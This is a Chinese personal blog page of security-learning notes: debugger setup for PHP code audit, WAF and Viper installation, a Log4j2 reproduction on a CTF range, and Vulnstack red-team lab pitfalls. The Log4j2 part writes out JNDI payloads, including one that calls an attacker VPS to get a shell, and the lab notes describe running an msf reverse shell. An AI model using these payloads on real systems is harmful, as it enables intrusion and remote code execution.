<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="前言仅作为自己学习网络安全,程序开发所踩的坑的记录 网络安全掉坑记利用PHPStudy搭建vscode + xdebug调试环境    前言:坑爹日记:新开的坑,记录自己走过的坑,避免以后忘记导致查资料会很痛苦. “利用PHPStudy搭建vscode + xdebug调试环境” 的作用:方便代码审计 牢骚:代码审计真的太难了,审一个cms审了很久也挖不出漏洞,挫败感太强了,所以找了以前被">
<meta property="og:type" content="article">
<meta property="og:title" content="[掉坑日记]掉坑汇总">
<meta property="og:url" content="https://github.com/TonyD0g/2022/04/14/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0%E6%8E%89%E5%9D%91%E6%B1%87%E6%80%BB/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="前言仅作为自己学习网络安全,程序开发所踩的坑的记录 网络安全掉坑记利用PHPStudy搭建vscode + xdebug调试环境    前言:坑爹日记:新开的坑,记录自己走过的坑,避免以后忘记导致查资料会很痛苦. “利用PHPStudy搭建vscode + xdebug调试环境” 的作用:方便代码审计 牢骚:代码审计真的太难了,审一个cms审了很久也挖不出漏洞,挫败感太强了,所以找了以前被">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OpleZd.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplEse.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplVqH.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplnII.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplmdA.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/04/30/OplKit.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7xKEt.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7xMUP.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7xQ4f.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7x1C8.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/03/12/b7zCrj.png">
<meta property="article:published_time" content="2022-04-14T07:23:09.000Z">
<meta property="article:modified_time" content="2023-07-20T07:36:00.472Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="掉坑日记">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2022/04/30/OpleZd.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[掉坑日记]掉坑汇总</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [掉坑日记]掉坑汇总
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-04-14T07:23:09.000Z" itemprop="datePublished">2022-04-14</time>
        
        (Updated: <time datetime="2023-07-20T07:36:00.472Z" itemprop="dateModified">2023-07-20</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/%E6%8E%89%E5%9D%91%E6%97%A5%E8%AE%B0/" rel="tag">掉坑日记</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <span id="more"></span>



<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>仅作为自己学习网络安全,程序开发所踩的坑的记录</p>
<h1 id="网络安全掉坑记"><a href="#网络安全掉坑记" class="headerlink" title="网络安全掉坑记"></a>网络安全掉坑记</h1><h2 id="利用PHPStudy搭建vscode-xdebug调试环境"><a href="#利用PHPStudy搭建vscode-xdebug调试环境" class="headerlink" title="利用PHPStudy搭建vscode + xdebug调试环境"></a>利用PHPStudy搭建vscode + xdebug调试环境</h2><font size=4 >

<!-- more -->

<p><strong>前言:</strong><br>坑爹日记:<br>新开的坑,记录自己走过的坑,避免以后忘记导致查资料会很痛苦.</p>
<p>“利用PHPStudy搭建vscode + xdebug调试环境” 的作用:<br>方便代码审计</p>
<p>牢骚:<br>代码审计真的太难了,审一个cms审了很久也挖不出漏洞,挫败感太强了,所以找了以前被挖穿的cms来复现看看,学下前辈们的思路和方法.最近更新速度下降了,是因为我没东西产出了,未来更新速度可能依旧会很慢(毕竟没东西产出,该产出的都一股脑输出了).因为学校突如其来的延期开学,我想着不能浪费差不多一个月的时间,所以就买了书学习,谁知道这快递速度真的感人,导致这几天我一直在等快递,心累┓(;´_｀)┏.</p>
<p><strong>小技巧:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">修改debug中的变量大小:</span><br><span class="line">https://www.baidu.com/link?url=DJqbgSK3g4NZviIBkMEvYuZvIZC0zoJ8Cy_2TJ1XjJZGWj5fB3mqC7p6ytxSarvxZfsABwVdpoKdoCOq&amp;wd=&amp;eqid=c01377e70001d7de00000006624d51fb</span><br></pre></td></tr></table></figure>

<p><strong>正文</strong><br>利用PHPStudy搭建xdebug调试环境 + vscode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">https://www.cnblogs.com/Risk2S/p/12369002.html </span><br><span class="line">https://www.cnblogs.com/phonecom/p/10340038.html</span><br><span class="line">https://www.baidu.com/link?url=8d4VCGsR9zKH69FzQDtb8K0LJBjXvzVZFyZqlxKpFiOlTlOj2wcTU4W0_cJP7V2rlTpZaBHjVTDJZDIXfPdEjdpV7jyAW-DPux0ycLZHFFO&amp;wd=&amp;eqid=dc8e04b000001e540000000662144793</span><br></pre></td></tr></table></figure>

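<p><strong>PS: 在 php.ini 文件的最后加上下面这些配置</strong><br>(这些是 Xdebug 2.x 的配置项名称；remote_port 要和 vscode 调试配置 launch.json 里的端口一致，remote_host 保持 127.0.0.1，只在本地调试环境开启远程调试)</p>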
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">[XDebug]</span><br><span class="line">    zend_extension=D:\phpstudy_pro\Extensions\php\php5.4.45nts\ext\php_xdebug.dll     ;用自己的路径,(全路径)</span><br><span class="line">    xdebug.remote_enable = 1   ;开启远程调试功能</span><br><span class="line">    xdebug.remote_autostart = 1    ;这个配置是比较重要的一个配置</span><br><span class="line">    xdebug.remote_handler = &quot;dbgp&quot;</span><br><span class="line">    xdebug.remote_port = &quot;9001&quot;   ;端口号</span><br><span class="line">    xdebug.remote_host = &quot;127.0.0.1&quot; ;远程调试的ip地址，即你自己的本机ip</span><br></pre></td></tr></table></figure>

<p><strong>调试步骤:</strong><br>1.vscode打开项目源代码,下断点<br>2.按F5,开始调试<br>3.刷新浏览器,开始代码审计</p>
</font>

<h2 id="利用Monitor监控SQL语句方便代码审计"><a href="#利用Monitor监控SQL语句方便代码审计" class="headerlink" title="利用Monitor监控SQL语句方便代码审计"></a>利用Monitor监控SQL语句方便代码审计</h2><font size=4 >

<!-- more -->

<p><strong>源代码下载安装:</strong><br>MySQL-Monitor：<a href="https://github.com/cw1997/MySQL-Monitor">https://github.com/cw1997/MySQL-Monitor</a></p>
<p><strong>操作流程:</strong><br>(操作前提:php版本在5.4以上!!!)<br>MySQL-Monitor的代码全部下载并解压后,将全部文件复制或移动到待审计的cms或项目目录下,访问mysql_monitor_client.html,输入数据库root用户的账号和密码,连接就完事了.<br>这个页面要用到数据库root凭据,所以只放在本地测试环境里用,审计结束后记得把这些文件从站点目录中删除.<br></font></p>
<h2 id="搭建WAF"><a href="#搭建WAF" class="headerlink" title="搭建WAF"></a>搭建WAF</h2><font size=4 >

<!-- more -->

<p><strong>前言：</strong><br>晚上更新：md，吃完饭又不行了。真折磨。搞半天<code>重启又好了</code>，真的迷惑<br>D盾搭建失败，安全狗也搭建不行。今天终于弄好了，真够折磨的。<br>不是在搭环境，就是搭环境的路上，麻了。</p>
<p><strong>正文</strong><br><a href="https://blog.csdn.net/songling515010475/article/details/106845000" target="_blank" rel="noopener">phpstudy安装安全狗找不到服务名</a></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OpleZd.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplEse.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplVqH.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplnII.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplmdA.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/04/30/OplKit.png" alt="avatar"></p>
<p><strong>示例模板:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39</span><br><span class="line"></span><br><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39</span><br><span class="line"></span><br><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39\conf\httpd.conf</span><br><span class="line"></span><br><span class="line">D:\phpstudy_pro\Extensions\Apache2.4.39\bin\httpd.exe</span><br><span class="line"></span><br><span class="line">apache2.4.39</span><br></pre></td></tr></table></figure>

</font>

<h2 id="VPS搭建Viper平台"><a href="#VPS搭建Viper平台" class="headerlink" title="VPS搭建Viper平台"></a>VPS搭建Viper平台</h2><font size=4 >

<!-- more -->

<p><strong>前言</strong><br>Viper：内网渗透利器<br>未来也会搭建CS<br>搭建这个搞了两小时，真的麻了,记录一下防止以后再坑我一次.</p>
<p><strong>必看:</strong><br><a href="https://zhuanlan.zhihu.com/p/76391447" target="_blank" rel="noopener">Xshell连接服务器</a><br><a href="https://www.yuque.com/vipersec/help/olg1ua" target="_blank" rel="noopener">Viper安装指南</a><br>先去服务器厂商那关闭服务器,</p>
<p>然后创建密钥,<br><img src="https://s1.ax1x.com/2022/03/12/b7xKEt.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/03/12/b7xMUP.png" alt="avatar"></p>
<p>并绑定密钥,</p>
<p>注意创建密钥后<strong>只会提供一次密钥文件下载！所以一定要保存好该密钥文件,因为用xshell连接服务器会需要它，而且经常需要！！！</strong><br><img src="https://s1.ax1x.com/2022/03/12/b7xQ4f.png" alt="avatar"></p>
<p><strong>如果你使用VPS部署Viper,请确认VPS的防火墙开放了60000端口及后续监听需要的端口</strong></p>
<p><strong>请注意，</strong><br>如果你装了什么小皮面板，或者其他什么面板，一定要同时去面板和服务器厂商那开放指定端口，不然会出现各种错误，我就是栽在这了。<br><img src="https://s1.ax1x.com/2022/03/12/b7x1C8.png" alt="avatar"></p>
<p><img src="https://s1.ax1x.com/2022/03/12/b7zCrj.png" alt="avatar"><br></font></p>
<h2 id="Log4j2简单复现"><a href="#Log4j2简单复现" class="headerlink" title="Log4j2简单复现"></a>Log4j2简单复现</h2><font size=4 >

<!-- more -->

<p><strong>前言:</strong></p>
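<p>2021年12月份爆出的漏洞，但是因为是java组件我了解的不多所以一直没有去复现。<br>前些天hvv面试问了，直接答的没复现。我感觉这样啥都不懂是不行的，所以今天抽空看了下复现。<br><code>仅仅复现了，具体代码原理不清楚</code>。主要靠别的师傅博客进行学习。</p>
<p>补充：漏洞成因是 Log4j2 在写日志时会解析消息里的 <code>${jndi:...}</code> 查找表达式，并向表达式中的地址发起 JNDI 请求。防护上应升级到官方已修复的 Log4j2 版本，并在请求日志和出站流量里排查 <code>${jndi:</code> 字符串以及异常的 LDAP/DNS 外连。</p>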
<p><strong>复现过程：</strong></p>
<p>给的两张图讲的很明白：<br><a href="https://blog.csdn.net/hiahiaQ_Q/article/details/123720995" target="_blank" rel="noopener">log4j</a></p>
<p><a href="https://github.com/Yihsiwei/Log4j-exp">EXP</a></p>
<p><strong>所需条件：</strong></p>
<p>CTFshow靶场 , 一台VPS</p>
<p><a href="https://www.ltool.net/base64-encode-and-decode-in-simplified-chinese.php" target="_blank" rel="noopener">Base64在线</a></p>
<p><a href="https://www.bejson.com/enc/urlencode/" target="_blank" rel="noopener">Url编码</a></p>
<p><a href="http://www.dnslog.cn/" target="_blank" rel="noopener">dnslog</a></p>
<p><strong>验证payload:</strong></p>
<p>${jndi:ldap:&#x2F;&#x2F;TonyD0g.dnslog.cn}</p>
<p><strong>GetShell payload:</strong></p>
<p>${jndi:ldap:&#x2F;&#x2F;VPSIP:1389&#x2F;Basic&#x2F;Command&#x2F;Base64&#x2F;xxxxxxxxx}</p>
</font>

<h2 id="VulnstackRedTeam1"><a href="#VulnstackRedTeam1" class="headerlink" title="VulnstackRedTeam1"></a>VulnstackRedTeam1</h2><!-- more -->

<h1 id="通关教程"><a href="#通关教程" class="headerlink" title="通关教程"></a>通关教程</h1><p>(这里psexec不知道为什么我不行，所以换msf上了,结果msf搞得我头大，proxychains死活不行。直接上头了，让kali镜像回溯为初始状态,然后psexec就能用了,迷惑…)</p>
<p><a href="https://blog.csdn.net/qq_46527080/article/details/112648202" target="_blank" rel="noopener">所以这里我看的这个通关</a></p>
<p><a href="https://blog.csdn.net/weixin_45605352/article/details/119740990?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164033306816780261969442%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=164033306816780261969442&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-119740990.first_rank_v2_pc_rank_v29&utm_term=%E7%BA%A2%E6%97%A5%E5%AE%89%E5%85%A8vulnstack-ATT&CK%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97%20%E7%BA%A2%E9%98%9F%E5%AE%9E%E6%88%98%EF%BC%88%E4%B8%80%EF%BC%89&spm=1018.2226.3001.4187" target="_blank" rel="noopener">这个是上面的详细版</a></p>
<p>也可以学习下别的师傅的思路：<br><a href="https://xz.aliyun.com/t/10076#toc-5" target="_blank" rel="noopener">链接1</a></p>
<p><a href="https://www.baidu.com/link?url=TwVhsVlUPEBKKs78IVPB46vMwZbdk7SGXvwoGllzdSaFSAaX9doWX8-HnuKCzgTZqbZHKHQ6TVtv57VnytEqoK&wd=&eqid=cde645d5000025d70000000662578f72" target="_blank" rel="noopener">链接2</a></p>
<h1 id="坑点记录"><a href="#坑点记录" class="headerlink" title="坑点记录"></a>坑点记录</h1><p>(坑点0)<br><a href="https://www.cnblogs.com/g0udan/p/12411937.html" target="_blank" rel="noopener">MSF进程迁移</a></p>
<p>(坑点1)<br>msf生成的shell.exe需要通过蚁剑上传到web服务器上,msf开启监听反弹shell<br>再通过蚁剑终端start shell.exe</p>
<p>(坑点2)<br><a href="https://www.baidu.com/link?url=MG-VGqpe91mLDxUp36Hm-j59ad16vfB6acPzId8xVPfY6SY_FghlxKO_EnryUh5eDsrUGO2smIYWhbLOpBIlayOAH6ATO6W7pzfM-JYWVfa&wd=&eqid=ca8584de000378ae0000000662579c45" target="_blank" rel="noopener">proxychains的使用</a></p>
<p>(坑点3)<br>CS psexec使用不了说明你CS卡死了，出现其他莫名其妙的情况,比如remove不了也是CS卡死了,重启CS 或 直接暴力回溯镜像 解决问题</p>
<p>(坑点4)<br>auxiliary&#x2F;server&#x2F;socks4a 在MSF6用不了<br>只能用 auxiliary&#x2F;server&#x2F;socks_proxy</p>
<h1 id="博客："><a href="#博客：" class="headerlink" title="博客："></a>博客：</h1><p><a href="https://zhuanlan.zhihu.com/p/474967971" target="_blank" rel="noopener">解决Hexo建站使用toc目录跳转 undefined的问题</a></p>
<p><a href="https://blog.csdn.net/qq_42951560/article/details/122552109" target="_blank" rel="noopener">hexo静态博客设置文章加密访问</a></p>
<p><a href="http://hk.javashuo.com/article/p-hrzakcbh-vg.html" target="_blank" rel="noopener">hugo+gitee</a></p>
<p><a href="https://ziyan1215.github.io/daily/1638860110/" target="_blank" rel="noopener">Hugo文章加密 | Xuzi</a></p>
<h1 id="VPS"><a href="#VPS" class="headerlink" title="VPS:"></a>VPS:</h1><p><a href="https://v.youhuima.cc/vultr-vps%E6%80%8E%E6%A0%B7%E8%AE%BE%E7%BD%AEssh-keys%E5%B9%B6%E7%94%A8%E4%B9%8B%E6%97%A0%E5%AF%86%E7%A0%81ssh%E7%99%BB%E5%BD%95.html" target="_blank" rel="noopener">vultr-vps怎样设置ssh-keys并用之无密码ssh登录</a></p>
<h1 id="数据库："><a href="#数据库：" class="headerlink" title="数据库："></a>数据库：</h1><p><a href="https://blog.csdn.net/qq_34462436/article/details/104690779" target="_blank" rel="noopener">mysql错误：Subquery returns more than 1 row</a></p>
<p><a href="https://www.cnblogs.com/jingran/p/16120104.html" target="_blank" rel="noopener">Java连接数据库</a></p>
<p><a href="https://github.com/baa-god/sql_node/blob/master/mysql/MySQL%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0.md">Mysql常用语句</a></p>
<h1 id="Docker"><a href="#Docker" class="headerlink" title="Docker:"></a>Docker:</h1><p><a href="https://blog.csdn.net/tpriwwq/article/details/41446277" target="_blank" rel="noopener">Win10系统基于WSL2安装Docker问题小结</a></p>
<p>1.不使用docker:(禁用hyper-v)</p>
<p>bcdedit &#x2F;set hypervisorlaunchtype off </p>
<p>2.使用docker<br>bcdedit &#x2F;set hypervisorlaunchtype auto</p>
<p>3.记得重启</p>
<h1 id="Visual-Studio-VScode-："><a href="#Visual-Studio-VScode-：" class="headerlink" title="Visual Studio&#x2F;VScode ："></a>Visual Studio&#x2F;VScode ：</h1><p><a href="https://blog.csdn.net/weixin_44671418/article/details/108124188" target="_blank" rel="noopener">Visual Studio高低版本转换</a></p>
<p><strong>VScode必装插件</strong></p>
<font size=4 >

<!-- more -->

<p>1.前端插件<br>2.各种语言插件<br>3.效率插件</p>
<p><strong>1.前端插件:</strong></p>
<p>Auto Close Tag<br>Auto Rename Tag<br>Path Intellisense<br>Live Preview</p>
<p><strong>2.各种语言插件:</strong></p>
<p>C&#x2F;C++ :</p>
<ul>
<li>C&#x2F;C++</li>
<li>C++ Intellisense</li>
<li>CMake</li>
<li>CMake Tools</li>
</ul>
<p>PHP :</p>
<ul>
<li>PHP Debug</li>
<li>PHP Intelephense</li>
</ul>
<p>Python :</p>
<ul>
<li>Pylance</li>
<li>Python</li>
<li>Jupyter</li>
</ul>
<p>MASM :</p>
<ul>
<li>MASM&#x2F;TASM</li>
<li>VSCode DOSBOX</li>
</ul>
<p>Docker :</p>
<ul>
<li>Docker</li>
</ul>
<p><strong>3.效率插件(这个可以全给他装上):</strong></p>
<p>Bracket Pair Colorizer 2<br>Chinese<br>Code Runner<br>Markdown Preview Enhanced<br>Markdown Preview Github Styling<br>Code Translate  (这个看需求装,有时候感觉这个挺烦的)<br>PlantUML</p>
<h1 id="多线程编程"><a href="#多线程编程" class="headerlink" title="多线程编程"></a>多线程编程</h1><p><a href="https://blog.csdn.net/zhuohui307317684/article/details/109723299" target="_blank" rel="noopener">java多线程的使用及易卡死的问题</a></p>
</font>


  </div>
</article>



        

        

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>



<script src="/js/main.js"></script>

<!-- search -->


<!-- Disqus Comments -->


</body>
</html>
